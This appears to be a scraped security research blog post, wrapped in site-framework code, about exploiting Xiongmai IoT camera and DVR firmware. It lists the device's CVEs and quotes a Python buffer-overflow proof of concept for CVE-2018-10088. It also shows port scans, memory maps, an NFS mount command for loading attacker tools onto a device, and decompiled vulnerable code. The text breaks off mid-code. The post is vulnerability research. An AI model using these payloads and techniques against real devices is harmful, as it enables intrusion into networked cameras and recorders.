var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .s_lYk, html code.shiki .s_lYk{--shiki-light:#9C3EDA;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .s4fT8, html code.shiki .s4fT8{--shiki-light:#90A4AE;--shiki-light-font-style:inherit;--shiki-default:#B31D28;--shiki-default-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic;--shiki-sepia:#F44747;--shiki-sepia-font-style:inherit}",{"title":219,"searchDepth":220,"depth":220,"links":115659},[],"An investigation into CVE-2022-28958 finds the vulnerability doesn't actually exist.",{"slug":115662,"category":115663},"moobot-uses-fake-vulnerability","updates","\u002Fblog\u002Fmoobot-uses-fake-vulnerability",{"title":112566,"description":115660},"blog\u002Fmoobot-uses-fake-vulnerability","cLiY7LMEwyefm5PeS05Ec1AZMw9l3oSra5bdmzLez9M",{"id":115669,"title":81971,"articles":115670,"authors":115674,"body":115676,"date":62051,"description":118377,"extension":234,"image":7,"link":7,"meta":118378,"navigation":237,"path":118380,"seo":118381,"series":7,"stem":118382,"subtype":7,"tags":118383,"__hash__":118384},"blog\u002Fblog\u002Fxiongmai-iot-exploitation.md",[115671],{"title":115672,"source":3494,"link":115673,"date":62073},"Risky Biz News: CryWiper hits Russian courts and mayor offices in data-wiping attacks","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-crywiper-hits-russian",[115675],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":115677,"toc":118370},[115678,115692,115697,115700,115751,115770,116166,116187,116190,116193,116199,116202,116204,116210,116225,116231,116234,116240,116243,116249,116252,116261,116267,116270,116276,116279,116290,116296,116322,116325,116329,116356,116367,116668,116675,116697,116700,116703,116706,116712,116731,116754,116760,116773,116779,116785,116793,116796,116801,117096,117099,117103,117115,117118,117124,117137,117148,117462,117484,117487,117493,117499,117503,117522,117531,117540,117543,117549,117557,117563,117572,117576,117589,117598,118038,118051,118057,118060,118065,118350,118357,118361,118364,118367],[18,115679,115680,115681,115686,115687,59],{},"There are a number of reasons ",[47,115682,115685],{"href":115683,"rel":115684},"https:\u002F\u002Fwww.xiongmaitech.com\u002Fen\u002Findex.php",[51],"Xiongmai"," devices are interesting targets. The first reason is there are a lot of them on the internet. Around ",[47,115688,115691],{"href":115689,"rel":115690},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=%28services.http.response.body%3A%22NetSuveillanceWebCookie%22+or+services.http.response.html_title%3A%22NetSurveillance+WEB%22%29+and+%28services.http.response.headers.server%3A%22uc-httpd%22+or+not+services.http.response.headers.server%3A%22*%22%29",[51],"200,000",[18,115693,115694],{},[68,115695],{":width":10862,"alt":112689,"src":115696},"\u002Fblog\u002Fxiongmai-iot-exploitation\u002Fcensys_results.png",[18,115698,115699],{},"The second reason is these devices have been affected by a handful of high or critical vulnerabilities:",[22,115701,115702,115709,115716,115724,115731,115738,115744],{},[25,115703,115704,115708],{},[47,115705,81767],{"href":115706,"rel":115707},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2017-7577",[51],": Unauthenticated HTTP request path traversal resulting in arbitrary file and credential disclosure.",[25,115710,115711,115715],{},[47,115712,81776],{"href":115713,"rel":115714},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2018-10088",[51],": Unauthenticated and remote HTTP login request stack-based buffer overflow.",[25,115717,115718,115723],{},[47,115719,115722],{"href":115720,"rel":115721},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-22253",[51],"CVE-2020-22253",": Port 9530 debug interface that allowed an unauthenticated attacker to open a telnet.",[25,115725,115726,115730],{},[47,115727,106686],{"href":115728,"rel":115729},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-41506",[51],": Port 9527 debug interface that allows an attacker using default credentials to execute arbitrary operating system commands (technically speaking, the wording of the CVE could include CVE-2020-22253 \u002F port 9530).",[25,115732,115733,115737],{},[47,115734,81977],{"href":115735,"rel":115736},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-26259",[51],": Unauthenticated and remote RTSP parsing stack buffer overflow.",[25,115739,115740,115743],{},[47,115741,106212],{"href":106220,"rel":115742},[51],": Authenticated and remote command execution via port 34567 upgrade logic.",[25,115745,115746,115750],{},[47,115747,81785],{"href":115748,"rel":115749},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-45460",[51],": Unauthenticated and remote HTTP request URI parsing stack-based buffer overflow.",[18,115752,115753,115754,14193,115758,982,115761,115765,115766,115769],{},"And that’s interesting due to an almost complete lack of high quality exploits for these vulnerabilities. You won’t find any in ",[47,115755,36852],{"href":115756,"rel":115757},"https:\u002F\u002Fwww.metasploit.com\u002F",[51],[47,115759,91930],{"href":91928,"rel":115760},[51],[47,115762,81936],{"href":115763,"rel":115764},"https:\u002F\u002Fgithub.com\u002Fthreat9\u002Froutersploit",[51]," only offer the path traversal information leak (CVE-2017-7577). One of the more widely cited Xiongmai ",[47,115767,11002],{"href":81939,"rel":115768},[51]," exploits is for CVE-2018-10088 and it’s entirely useless for code execution.",[1354,115771,115773],{"className":11719,"code":115772,"language":11721,"meta":219,"style":219},"# Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow\n# Date: 2018-06-08 \n# Exploit Author: Andrew Watson\n# Software Version: XiongMai uc-httpd 1.0.0\n# Vendor Homepage: http:\u002F\u002Fwww.xiongmaitech.com\u002Fen\u002F\n# Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP\u002F81\n# CVE ID: CVE-2018-10088\n# DISCLAIMER: This proof of concept is provided for educational purposes only!\n \n#!\u002Fusr\u002Fbin\u002Fpython\n \nimport socket\nimport sys\n \npayload=\"A\" * 85\n \nprint \"\\n###############################################\"\nprint \"XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit\"\n \nif len(sys.argv) \u003C 2:\n print \"\\nUsage: \" + sys.argv[0] + \" \u003CHost>\\n\"\n sys.exit()\n \nprint \"\\nTarget: \" + sys.argv[1]\nprint \"Sending exploit...\"\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((sys.argv[1],81))\ns.send('POST \u002Flogin.htm HTTP\u002F1.1\\r\\n')\ns.send('command=login&username=' + payload + '&password=PoC\\r\\n\\r\\n')\ns.recv(1024)\ns.close()\nprint \"\\nExploit complete!\"\n\n",[886,115774,115775,115780,115785,115790,115795,115800,115805,115810,115815,115819,115824,115828,115835,115841,115845,115862,115866,115880,115891,115895,115917,115955,115967,115971,115998,116009,116043,116070,116092,116127,116143,116153],{"__ignoreMap":219},[1373,115776,115777],{"class":1375,"line":1376},[1373,115778,115779],{"class":4630},"# Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow\n",[1373,115781,115782],{"class":1375,"line":220},[1373,115783,115784],{"class":4630},"# Date: 2018-06-08 \n",[1373,115786,115787],{"class":1375,"line":1266},[1373,115788,115789],{"class":4630},"# Exploit Author: Andrew Watson\n",[1373,115791,115792],{"class":1375,"line":1852},[1373,115793,115794],{"class":4630},"# Software Version: XiongMai uc-httpd 1.0.0\n",[1373,115796,115797],{"class":1375,"line":4692},[1373,115798,115799],{"class":4630},"# Vendor Homepage: http:\u002F\u002Fwww.xiongmaitech.com\u002Fen\u002F\n",[1373,115801,115802],{"class":1375,"line":4724},[1373,115803,115804],{"class":4630},"# Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP\u002F81\n",[1373,115806,115807],{"class":1375,"line":4756},[1373,115808,115809],{"class":4630},"# CVE ID: CVE-2018-10088\n",[1373,115811,115812],{"class":1375,"line":4768},[1373,115813,115814],{"class":4630},"# DISCLAIMER: This proof of concept is provided for educational purposes only!\n",[1373,115816,115817],{"class":1375,"line":4792},[1373,115818,19298],{"class":4640},[1373,115820,115821],{"class":1375,"line":4798},[1373,115822,115823],{"class":4630},"#!\u002Fusr\u002Fbin\u002Fpython\n",[1373,115825,115826],{"class":1375,"line":4806},[1373,115827,19298],{"class":4640},[1373,115829,115830,115832],{"class":1375,"line":4817},[1373,115831,19043],{"class":4636},[1373,115833,115834],{"class":4640}," socket\n",[1373,115836,115837,115839],{"class":1375,"line":4825},[1373,115838,19043],{"class":4636},[1373,115840,56176],{"class":4640},[1373,115842,115843],{"class":1375,"line":4835},[1373,115844,19298],{"class":4640},[1373,115846,115847,115849,115851,115853,115855,115857,115859],{"class":1375,"line":4843},[1373,115848,11736],{"class":4640},[1373,115850,5417],{"class":1397},[1373,115852,183],{"class":1387},[1373,115854,103840],{"class":1391},[1373,115856,183],{"class":1387},[1373,115858,19113],{"class":1397},[1373,115860,115861],{"class":5467}," 85\n",[1373,115863,115864],{"class":1375,"line":4849},[1373,115865,19298],{"class":4640},[1373,115867,115868,115871,115873,115875,115878],{"class":1375,"line":4877},[1373,115869,115870],{"class":1379},"print",[1373,115872,4883],{"class":1387},[1373,115874,8943],{"class":2326},[1373,115876,115877],{"class":1391},"###############################################",[1373,115879,19057],{"class":1387},[1373,115881,115882,115884,115886,115889],{"class":1375,"line":4915},[1373,115883,115870],{"class":1379},[1373,115885,4883],{"class":1387},[1373,115887,115888],{"class":1391},"XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit",[1373,115890,19057],{"class":1387},[1373,115892,115893],{"class":1375,"line":4931},[1373,115894,19298],{"class":4640},[1373,115896,115897,115899,115901,115903,115905,115907,115909,115911,115913,115915],{"class":1375,"line":4947},[1373,115898,4637],{"class":4636},[1373,115900,11730],{"class":1379},[1373,115902,1384],{"class":1383},[1373,115904,70245],{"class":11735},[1373,115906,59],{"class":1383},[1373,115908,89326],{"class":63570},[1373,115910,2230],{"class":1383},[1373,115912,27250],{"class":1397},[1373,115914,5499],{"class":5467},[1373,115916,11747],{"class":1383},[1373,115918,115919,115921,115923,115925,115928,115930,115932,115934,115936,115938,115940,115942,115944,115946,115948,115951,115953],{"class":1375,"line":4952},[1373,115920,63893],{"class":1379},[1373,115922,4883],{"class":1387},[1373,115924,8943],{"class":2326},[1373,115926,115927],{"class":1391},"Usage: ",[1373,115929,183],{"class":1387},[1373,115931,15478],{"class":1397},[1373,115933,89321],{"class":4640},[1373,115935,59],{"class":1383},[1373,115937,89326],{"class":63570},[1373,115939,7035],{"class":1383},[1373,115941,445],{"class":5467},[1373,115943,15050],{"class":1383},[1373,115945,15478],{"class":1397},[1373,115947,4883],{"class":1387},[1373,115949,115950],{"class":1391}," \u003CHost>",[1373,115952,8943],{"class":2326},[1373,115954,19057],{"class":1387},[1373,115956,115957,115960,115962,115965],{"class":1375,"line":6776},[1373,115958,115959],{"class":4640}," sys",[1373,115961,59],{"class":1383},[1373,115963,115964],{"class":11735},"exit",[1373,115966,27326],{"class":1383},[1373,115968,115969],{"class":1375,"line":6781},[1373,115970,19298],{"class":4640},[1373,115972,115973,115975,115977,115979,115982,115984,115986,115988,115990,115992,115994,115996],{"class":1375,"line":7524},[1373,115974,115870],{"class":1379},[1373,115976,4883],{"class":1387},[1373,115978,8943],{"class":2326},[1373,115980,115981],{"class":1391},"Target: ",[1373,115983,183],{"class":1387},[1373,115985,15478],{"class":1397},[1373,115987,89321],{"class":4640},[1373,115989,59],{"class":1383},[1373,115991,89326],{"class":63570},[1373,115993,7035],{"class":1383},[1373,115995,467],{"class":5467},[1373,115997,7103],{"class":1383},[1373,115999,116000,116002,116004,116007],{"class":1375,"line":7530},[1373,116001,115870],{"class":1379},[1373,116003,4883],{"class":1387},[1373,116005,116006],{"class":1391},"Sending exploit...",[1373,116008,19057],{"class":1387},[1373,116010,116011,116013,116015,116018,116020,116022,116024,116026,116028,116031,116033,116036,116038,116041],{"class":1375,"line":7546},[1373,116012,94930],{"class":4640},[1373,116014,5417],{"class":1397},[1373,116016,116017],{"class":4640},"socket",[1373,116019,59],{"class":1383},[1373,116021,116017],{"class":11735},[1373,116023,1384],{"class":1383},[1373,116025,116017],{"class":11735},[1373,116027,59],{"class":1383},[1373,116029,116030],{"class":37971},"AF_INET",[1373,116032,5437],{"class":1383},[1373,116034,116035],{"class":11735}," socket",[1373,116037,59],{"class":1383},[1373,116039,116040],{"class":37971},"SOCK_STREAM",[1373,116042,11875],{"class":1383},[1373,116044,116045,116047,116049,116052,116054,116056,116058,116060,116062,116064,116066,116068],{"class":1375,"line":7571},[1373,116046,94930],{"class":4640},[1373,116048,59],{"class":1383},[1373,116050,116051],{"class":11735},"connect",[1373,116053,15969],{"class":1383},[1373,116055,70245],{"class":11735},[1373,116057,59],{"class":1383},[1373,116059,89326],{"class":63570},[1373,116061,7035],{"class":1383},[1373,116063,467],{"class":5467},[1373,116065,27625],{"class":1383},[1373,116067,81659],{"class":5467},[1373,116069,16761],{"class":1383},[1373,116071,116072,116074,116076,116079,116081,116083,116086,116088,116090],{"class":1375,"line":7598},[1373,116073,94930],{"class":4640},[1373,116075,59],{"class":1383},[1373,116077,116078],{"class":11735},"send",[1373,116080,1384],{"class":1383},[1373,116082,1388],{"class":1387},[1373,116084,116085],{"class":1391},"POST \u002Flogin.htm HTTP\u002F1.1",[1373,116087,15491],{"class":2326},[1373,116089,1388],{"class":1387},[1373,116091,11875],{"class":1383},[1373,116093,116094,116096,116098,116100,116102,116104,116107,116109,116111,116113,116115,116117,116120,116123,116125],{"class":1375,"line":7615},[1373,116095,94930],{"class":4640},[1373,116097,59],{"class":1383},[1373,116099,116078],{"class":11735},[1373,116101,1384],{"class":1383},[1373,116103,1388],{"class":1387},[1373,116105,116106],{"class":1391},"command=login&username=",[1373,116108,1388],{"class":1387},[1373,116110,15478],{"class":1397},[1373,116112,89427],{"class":11735},[1373,116114,15448],{"class":1397},[1373,116116,4713],{"class":1387},[1373,116118,116119],{"class":1391},"&password=PoC",[1373,116121,116122],{"class":2326},"\\r\\n\\r\\n",[1373,116124,1388],{"class":1387},[1373,116126,11875],{"class":1383},[1373,116128,116129,116131,116133,116136,116138,116141],{"class":1375,"line":7635},[1373,116130,94930],{"class":4640},[1373,116132,59],{"class":1383},[1373,116134,116135],{"class":11735},"recv",[1373,116137,1384],{"class":1383},[1373,116139,116140],{"class":5467},"1024",[1373,116142,11875],{"class":1383},[1373,116144,116145,116147,116149,116151],{"class":1375,"line":7640},[1373,116146,94930],{"class":4640},[1373,116148,59],{"class":1383},[1373,116150,75402],{"class":11735},[1373,116152,27326],{"class":1383},[1373,116154,116155,116157,116159,116161,116164],{"class":1375,"line":7648},[1373,116156,115870],{"class":1379},[1373,116158,4883],{"class":1387},[1373,116160,8943],{"class":2326},[1373,116162,116163],{"class":1391},"Exploit complete!",[1373,116165,19057],{"class":1387},[18,116167,116168,116169,116172,116173,10515,116177,10515,116182,116186],{},"Which brings me to the third reason I find these targets to be interesting, despite the lack of quality exploits, we know at least five of these issues have been exploited in the wild. You won’t find them listed in CISA’s ",[47,116170,10993],{"href":2864,"rel":116171},[51],", but ",[47,116174,116176],{"href":106693,"rel":116175},[51],"high",[47,116178,116181],{"href":116179,"rel":116180},"https:\u002F\u002Fcybersecurity.att.com\u002Fblogs\u002Flabs-research\u002Fbotenago-strike-again-malware-source-code-uploaded-to-github",[51],"quality",[47,116183,111257],{"href":116184,"rel":116185},"https:\u002F\u002Fblog.netlab.360.com\u002Fthe-new-developments-of-the-fbot-en\u002F",[51],", Greynoise, and our own honeypots leave no doubt (more on that later).",[18,116188,116189],{},"Another reason I find Xiongmai devices interesting is the continuity of the underlying software. A lot of IoT vendors ship wildly different firmware depending on the model or underlying hardware. Not the case with Xiongmai. The underlying software is more or less the same from 2016 through 2022. The majority of the system logic flows through a single binary named Sofia. Just as it always has. That’s useful for an attacker (or researcher) because knowledge gained using a 2016 exploit can sometimes still be useful for a 2022 exploit.",[18,116191,116192],{},"Finally, the last reason these systems are interesting is they are very easy to acquire. Just snag one off of Amazon. They are relatively cheap too. Availability and price probably goes a long way to explaining their popularity.",[18,116194,116195],{},[68,116196],{":width":10862,"alt":116197,"src":116198},"amazon_order","\u002Fblog\u002Fxiongmai-iot-exploitation\u002Famazon_sunba.png",[18,116200,116201],{},"Having hopefully convinced you that these systems are worthy of your attention, the remainder of this blog will be devoted to looking at these systems, and their exploitation, in more depth. We’ll quickly look at how the system has evolved over the years. We’ll look at developing exploits for two of the stack buffer overflows. We’ll examine a payload caught in a honeypot. Attempt to get an idea of how widespread exploitation is, and finally look at some concerning files on the Xiongmai firmware server.",[18,116203,116201],{},[1354,116205,116208],{"className":116206,"code":116207,"language":1359},[1357],"albinolobster@mournland:~$ nmap -sV -p1-65535 10.12.70.210\nStarting Nmap 7.80 ( https:\u002F\u002Fnmap.org ) at 2022-11-18 09:48 EST\nNmap scan report for 10.12.70.210\nHost is up (0.0025s latency).\nNot shown: 65530 closed ports\nPORT STATE SERVICE VERSION\n80\u002Ftcp open http uc-httpd 1.0.0\n554\u002Ftcp open rtsp H264DVR rtspd 1.0\n9527\u002Ftcp open unknown\n9530\u002Ftcp open unknown\n34567\u002Ftcp open dhanalakshmi?\n",[886,116209,116207],{"__ignoreMap":219},[18,116211,116212,116213,116218,116219,116224],{},"All of these ports are affected by RCE vulnerabilities. Port 9527 (CVE-2021-41506) and 9530 (CVE-2020-22253) are particularly egregious ",[47,116214,116217],{"href":116215,"rel":116216},"https:\u002F\u002Fcwe.mitre.org\u002Fdata\u002Fdefinitions\u002F489.html",[51],"debugging interfaces"," that were eventually phased out. A scan of an ",[47,116220,116223],{"href":116221,"rel":116222},"https:\u002F\u002Fwww.xiongmaitech.com\u002Fen\u002Findex.php\u002Fproduct\u002Fproduct-detail\u002F4\u002F225\u002F273",[51],"NBD8008R-PL"," using software version V4.03.R11.C6380202.12201.140000.0000000 (build time “2021-05-19”) shows 80, 554, and 34567 have remained constants, but a couple new ports have taken the place of the old debug interfaces:",[1354,116226,116229],{"className":116227,"code":116228,"language":1359},[1357],"albinolobster@mournland:~$ nmap -sV -p1-65535 10.12.70.218\nStarting Nmap 7.80 ( https:\u002F\u002Fnmap.org ) at 2022-11-18 09:52 EST\nNmap scan report for 10.12.70.218\nHost is up (0.0041s latency).\nNot shown: 65530 closed ports\nPORT STATE SERVICE VERSION\n80\u002Ftcp open http\n554\u002Ftcp open rtsp H264DVR rtspd 1.0\n23000\u002Ftcp open inovaport1?\n30100\u002Ftcp open rwp?\n34567\u002Ftcp open dhanalakshmi?\n",[886,116230,116228],{"__ignoreMap":219},[18,116232,116233],{},"Once on the device you can see that Sofia controlled most, but not all, of the ports in the 2016 version:",[1354,116235,116238],{"className":116236,"code":116237,"language":1359},[1357],"[root@LocalHost \u002Fvar]$ netstat -tlpn\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address Foreign Address State PID\u002FProgram name \ntcp 0 0 0.0.0.0:34567 0.0.0.0:* LISTEN 615\u002FSofia\ntcp 0 0 0.0.0.0:554 0.0.0.0:* LISTEN 615\u002FSofia\ntcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 615\u002FSofia\ntcp 0 0 0.0.0.0:9527 0.0.0.0:* LISTEN 614\u002FdvrHelper\ntcp 0 0 0.0.0.0:9530 0.0.0.0:* LISTEN 600\u002FmacGuarder\n",[886,116239,116237],{"__ignoreMap":219},[18,116241,116242],{},"By 2021 Sofia had consolidated control over all the remote interfaces:",[1354,116244,116247],{"className":116245,"code":116246,"language":1359},[1357],"\u002Fvar # netstat -tlpn\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address Foreign Address State PID\u002FProgram name \ntcp 0 0 0.0.0.0:554 0.0.0.0:* LISTEN 1047\u002FSofia\ntcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1047\u002FSofia\ntcp 0 0 0.0.0.0:30100 0.0.0.0:* LISTEN 1047\u002FSofia\ntcp 0 0 0.0.0.0:23000 0.0.0.0:* LISTEN 1047\u002FSofia\ntcp 0 0 0.0.0.0:34567 0.0.0.0:* LISTEN 1047\u002FSofia\n",[886,116248,116246],{"__ignoreMap":219},[18,116250,116251],{},"Sofia itself is not hugely different. Some functionality has come and gone, but, for example, the logic for parsing an HTTP request is recognizable when comparing a 2016 version against a 2022 version.",[18,116253,116254,116255,1246,116257,116260],{},"The most impactful changes have been a general cleanup of buffer overflows (using ",[886,116256,39210],{},[886,116258,116259],{},"strncpy",", etc), dynamically linking uClibc instead of statically compiling it in, and, from an exploitation point of view, disabling data execution. The system, dating back to 2016, has always had ASLR enabled, so in all versions we expect the heap, dynamic libraries, and the stack to have randomized base addresses. But in 2016, almost all writable pages were executable.",[1354,116262,116265],{"className":116263,"code":116264,"language":1359},[1357],"[root@LocalHost \u002Fvar]$ cat \u002Fproc\u002F615\u002Fmaps\n00008000-007df000 r-xp 00000000 00:0d 336 \u002Fvar\u002FSofia\n007e6000-0081e000 rwxp 007d6000 00:0d 336 \u002Fvar\u002FSofia\n0081e000-00a8c000 rwxp 00000000 00:00 0\n029c6000-035c0000 rwxp 00000000 00:00 0 [heap]\n… many lines removed …\nbe9da000-be9fb000 rwxp 00000000 00:00 0 [stack]\nffff0000-ffff1000 r-xp 00000000 00:00 0 [vectors]\n",[886,116266,116264],{"__ignoreMap":219},[18,116268,116269],{},"Which was especially useful because Sofia was not, and still is not, compiled as a position independent executable. It’s also useful to know that Sofia operates on a number of global data structures that, in older versions, an attacker could overwrite with shellcode to aid in exploitation (more on that later). But fast forward to 2022 and newer versions of Sofia aren’t as kind to attackers. Sofia’s base isn’t randomized, but data execution has been disabled:",[1354,116271,116274],{"className":116272,"code":116273,"language":1359},[1357],"\u002Fvar # cat \u002Fproc\u002F1047\u002Fmaps\n00010000-00854000 r-xp 00000000 00:0d 954 \u002Fvar\u002FSofia\n00863000-008bb000 rw-p 00843000 00:0d 954 \u002Fvar\u002FSofia\n008bb000-02024000 rw-p 00000000 00:00 0 [heap]\n… many lines removed …\nbeb51000-beb73000 rw-p 00000000 00:00 0 [stack]\nbebe4000-bebe5000 r-xp 00000000 00:00 0 [sigpage]\nbebe5000-bebe6000 r--p 00000000 00:00 0 [vvar]\nbebe6000-bebe7000 r-xp 00000000 00:00 0 [vdso]\nffff0000-ffff1000 r-xp 00000000 00:00 0 [vectors]\n",[886,116275,116273],{"__ignoreMap":219},[18,116277,116278],{},"Of course, ROP chains are still very much in play with the new version, as we’ll see for CVE-2022-26259, but things are a bit more difficult than they were back in 2016.",[18,116280,116281,116282,116286,116287,116289],{},"The final thing that hasn’t changed over the years is that these devices are almost devoid of ",[47,116283,116285],{"href":37718,"rel":116284},[51],"gtfobins",". The system has no curl, wget, nc, telnet, etc, for an attacker to download an implant or establish reverse shells. The ",[1131,116288,62400],{}," gtfobin Xiongmai devices have is busybox’s telnetd. And sometimes the telnetd symlink doesn’t even exist on the system, so the attacker has to invoke the binary via busybox directly (a challenge given the size constraints of some of the overflows). While telnetd is useful, it’s a limiting factor for real world attacks, as it requires the victim not to have a firewall in place that would prevent access to the newly opened port.",[18,116291,116292,116293,116295],{},"Spending time on this system did make me appreciate one command that isn’t generally considered a gtfobin: the ",[886,116294,16339],{}," command. Downloading and executing files via a mounted network file share saved me a lot of time I’d otherwise have spent echoing binaries onto the system.",[1354,116297,116299],{"className":2195,"code":116298,"language":2197,"meta":219,"style":219},"mkdir \u002Fvar\u002Fxploit_tools\u002F\nmount -o nolock 10.12.70.252:\u002Fsrv\u002F \u002Fvar\u002Fxploit_tools\u002F\n",[886,116300,116301,116308],{"__ignoreMap":219},[1373,116302,116303,116305],{"class":1375,"line":1376},[1373,116304,31859],{"class":2206},[1373,116306,116307],{"class":1391}," \u002Fvar\u002Fxploit_tools\u002F\n",[1373,116309,116310,116312,116314,116317,116320],{"class":1375,"line":220},[1373,116311,16339],{"class":2206},[1373,116313,39692],{"class":2209},[1373,116315,116316],{"class":1391}," nolock",[1373,116318,116319],{"class":1391}," 10.12.70.252:\u002Fsrv\u002F",[1373,116321,116307],{"class":1391},[18,116323,116324],{},"With that background information, let’s look at developing some exploits.",[61,116326,116328],{"id":116327},"cve-2018-10088-credentials-overflow","CVE-2018-10088: Credentials Overflow",[18,116330,116331,116332,116337,116338,116341,116342,116345,116346,1554,116350,116355],{},"Multiple security companies have linked exploitation of CVE-2018-10088 to botnets. Fortiguard linked it to ",[47,116333,116336],{"href":116334,"rel":116335},"https:\u002F\u002Fwww.fortiguard.com\u002Fthreat-signal-report\u002F4389\u002Fbotenago-malware-targets-multiple-iot-devices",[51],"Botenago",". Netlab 360 linked it to ",[47,116339,81951],{"href":81949,"rel":116340},[51],". Fortinet linked it to ",[47,116343,81956],{"href":81954,"rel":116344},[51],". Although both Greynoise tags for this CVE are ",[47,116347,81313],{"href":116348,"rel":116349},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fxiongmai-buffer-overflow-cve-2018-10088-attempt?days=30",[51],[47,116351,116354],{"href":116352,"rel":116353},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fxiongmai-uc-httpd-buffer-overflow-attempt?days=30",[51],"less"," inactive.",[18,116357,116358,116359,116362,116363,116366],{},"Regardless, exploitation in the wild is interesting because we aren’t aware of any public exploits that lead to code execution for this vulnerability (as stated earlier, the exploit-db ",[47,116360,22852],{"href":81939,"rel":116361},[51]," only triggers a crash). So we wrote our own. This proved to be a fairly trivial exercise. The buffer overflow is the result of copying the username and password from ",[886,116364,116365],{},"command=login"," into some global memory.",[1354,116368,116370],{"className":92494,"code":116369,"language":28578,"meta":219,"style":219},"iVar1 = FUN_006784e4(0,\"&\");\nstrcpy(&global_username,iVar1 + 9);\niVar1 = FUN_006784e4(0,\"&\");\nstrcpy(&global_password,iVar1 + 9);\nDAT_00a3c4d8 = DAT_00a3c4e4;\nif (DAT_009806f8 != (code *)0x0) {\n DAT_00a3c4a8 = (*DAT_009806f8)(0,&global_username,0x2c,DAT_00a3c504);\n}\nif (DAT_00a3c4a8 == 0) {\n sprintf(local_140,\"%s%s\",\"\u002Fmnt\",\"\u002FDVR\");\n FUN_004193dc(param_1,local_140,0);\n return 0;\n}\nsprintf(local_140,\"%s%s\",\"\u002Fmnt\",\"\u002Ffailed.htm\");\n\n",[886,116371,116372,116396,116419,116441,116462,116474,116502,116541,116545,116562,116601,116621,116629,116633],{"__ignoreMap":219},[1373,116373,116374,116377,116379,116382,116384,116386,116388,116390,116392,116394],{"class":1375,"line":1376},[1373,116375,116376],{"class":4640},"iVar1 ",[1373,116378,5417],{"class":1397},[1373,116380,116381],{"class":7297}," FUN_006784e4",[1373,116383,1384],{"class":1383},[1373,116385,445],{"class":5467},[1373,116387,5437],{"class":1383},[1373,116389,183],{"class":1387},[1373,116391,7218],{"class":1391},[1373,116393,183],{"class":1387},[1373,116395,4680],{"class":1383},[1373,116397,116398,116401,116403,116405,116408,116410,116412,116414,116417],{"class":1375,"line":220},[1373,116399,116400],{"class":7297},"strcpy",[1373,116402,1384],{"class":1383},[1373,116404,7218],{"class":1397},[1373,116406,116407],{"class":19096},"global_username",[1373,116409,5437],{"class":1383},[1373,116411,116376],{"class":4640},[1373,116413,15448],{"class":1397},[1373,116415,116416],{"class":5467}," 